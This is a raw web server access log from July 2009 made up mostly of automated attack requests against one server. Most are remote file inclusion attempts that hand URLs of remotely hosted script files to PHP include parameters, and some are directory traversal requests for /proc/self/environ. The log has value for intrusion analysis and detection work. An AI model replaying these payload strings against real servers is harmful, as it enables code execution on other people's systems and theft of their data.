114.200.199.144 - - [18/Jul/2009:01:43:27 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:43:28 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:43:32 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.198.76.196 - - [18/Jul/2009:01:43:45 -0400] "GET /logs/access_log.Q109061900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.65"
74.53.70.114 - - [18/Jul/2009:01:44:02 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:44:02 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.242.110.197 - - [18/Jul/2009:01:44:04 -0400] "GET /logs/access_log.Q109061800//main.php?sayfa=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:44:04 -0400] "GET //main.php?sayfa=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:44:04 -0400] "GET /logs//main.php?sayfa=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:44:08 -0400] "GET /logs/access_log.Q109061800//main.php?sayfa=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:44:08 -0400] "GET /logs//main.php?sayfa=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:44:08 -0400] "GET //main.php?sayfa=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:44:13 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:44:17 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
74.53.70.114 - - [18/Jul/2009:01:44:25 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:44:25 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:44:40 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:45:19 -0400] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:45:20 -0400] "GET /logs/access_log.Q109061600/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:45:20 -0400] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:01:45:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.197.183.21 - - [18/Jul/2009:01:45:45 -0400] "GET /embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:45:45 -0400] "GET /logs/embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:45:45 -0400] "GET /logs/access_log.Q109051900%20%20/embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:45:50 -0400] "GET /logs/access_log.Q109061500%20%20/embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:45:54 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:45:59 -0400] "GET /logs/access_log.Q109070700/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:46:01 -0400] "GET /embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:46:01 -0400] "GET /logs/embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:46:01 -0400] "GET /logs/access_log.Q109051900%20%20/embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:46:07 -0400] "GET /logs/access_log.Q109061500%20%20/embed/day.php?path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:46:11 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:46:52 -0400] "GET /logs/access_log.Q109061600%20%20/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:46:58 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:47:03 -0400] "GET /logs/access_log.Q109070700%20%20/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.242.110.197 - - [18/Jul/2009:01:47:11 -0400] "GET /logs/access_log.Q109060100//main.php?sayfa=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:47:17 -0400] "GET /logs/access_log.Q109060100//main.php?sayfa=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
125.243.207.199 - - [18/Jul/2009:01:47:26 -0400] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:47:31 -0400] "GET /logs/access_log.Q109061600/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:47:31 -0400] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:48:01 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:48:03 -0400] "GET /logs/access_log.Q109070700/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:49:23 -0400] "GET /logs/access_log.Q109061600%20%20/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:01:49:37 -0400] "GET /logs/access_log.Q109070700%20%20/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.242.110.197 - - [18/Jul/2009:01:50:16 -0400] "GET /logs/access_log.Q109060100%20//galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:50:18 -0400] "GET /logs/access_log.Q109060100%20//galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Jul/2009:01:50:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.10.63.163 - - [18/Jul/2009:01:51:33 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:51:33 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:51:33 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:51:34 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
141.223.5.11 - - [18/Jul/2009:01:52:29 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
141.223.5.11 - - [18/Jul/2009:01:52:29 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.10.63.163 - - [18/Jul/2009:01:52:44 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:52:44 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:52:44 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:52:44 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:53:28 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:53:33 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:54:25 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:01:54:29 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:01:54:41 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:01:54:41 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:01:54:41 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:01:54:43 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:01:54:43 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:01:54:43 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:01:55:06 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:01:55:06 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:01:55:06 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:01:55:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [18/Jul/2009:01:55:45 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:55:45 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:01:56:10 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:01:56:10 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:01:56:10 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:01:56:49 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:01:57:13 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:01:58:02 -0400] "GET /logs/access_log.Q109052100////////?cmd&file=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:01:58:02 -0400] "GET ////////?cmd&file=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 200 458 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:01:58:02 -0400] "GET /logs////////?cmd&file=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 200 10005 "-" "libwww-perl/5.805"
141.223.5.11 - - [18/Jul/2009:01:58:23 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
201.232.54.48 - - [18/Jul/2009:01:58:27 -0400] "GET /logs/access_log.Q109051200////////?cmd&file=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:01:58:33 -0400] "GET /logs/access_log.Q109051200////////?cmd&file=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
58.227.193.198 - - [18/Jul/2009:01:58:34 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:01:58:34 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:01:58:34 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:01:58:39 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:01:59:07 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.38.252.252 - - [18/Jul/2009:01:59:14 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.76"
89.38.252.252 - - [18/Jul/2009:01:59:14 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.76"
89.38.252.252 - - [18/Jul/2009:01:59:14 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.76"
89.38.252.252 - - [18/Jul/2009:01:59:21 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.76"
89.38.252.252 - - [18/Jul/2009:01:59:21 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.76"
89.38.252.252 - - [18/Jul/2009:01:59:22 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.76"
89.38.252.252 - - [18/Jul/2009:01:59:38 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.76"
89.38.252.252 - - [18/Jul/2009:01:59:45 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.76"
69.10.63.163 - - [18/Jul/2009:02:00:18 -0400] "GET /logs/index.php?page=http://2006.aninite.at/mambots/test.txt?? HTTP/1.1" 404 212 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
69.10.63.163 - - [18/Jul/2009:02:00:18 -0400] "GET /index.php?page=http://2006.aninite.at/mambots/test.txt?? HTTP/1.1" 404 207 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
209.59.12.99 - - [18/Jul/2009:02:00:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.92 - - [18/Jul/2009:02:01:10 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:02:02:37 -0400] "GET /index.php?stranica=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:02:02:37 -0400] "GET /logs/index.php?stranica=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:02:02:37 -0400] "GET /logs/access_log.Q109060900/index.php?stranica=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.191.11.195 - - [18/Jul/2009:02:02:43 -0400] "GET /logs/access_log.Q109051100/forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:02:02:43 -0400] "GET /forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 207 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:02:02:44 -0400] "GET /forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:02:02:44 -0400] "GET /logs/access_log.Q109051100/forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:02:02:45 -0400] "GET /logs/forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 212 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:02:02:46 -0400] "GET /logs/forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "XXXXXX"
89.191.11.195 - - [18/Jul/2009:02:02:46 -0400] "GET /logs/access_log.Q109070100/forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
212.112.224.125 - - [18/Jul/2009:02:02:47 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
212.112.224.125 - - [18/Jul/2009:02:02:47 -0400] "GET //include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
89.191.11.195 - - [18/Jul/2009:02:02:47 -0400] "GET /logs/access_log.Q109070100/forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
212.112.224.125 - - [18/Jul/2009:02:02:47 -0400] "GET /logs/access_log.Q109062500//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
210.205.57.2 - - [18/Jul/2009:02:02:57 -0400] "GET /logs/access_log.Q109062700/index.php?stranica=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:03:12 -0400] "GET /logs/error_log.Q109061600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
123.143.98.5 - - [18/Jul/2009:02:04:09 -0400] "GET /logs/access_log.Q109062500//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
123.143.98.5 - - [18/Jul/2009:02:04:09 -0400] "GET //include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
123.143.98.5 - - [18/Jul/2009:02:04:09 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
141.223.5.12 - - [18/Jul/2009:02:04:14 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
59.24.49.35 - - [18/Jul/2009:02:04:31 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:02:04:41 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:05:21 -0400] "GET /logs/access_log.Q109060100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:02:05:23 -0400] "GET /embed/day.php?path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
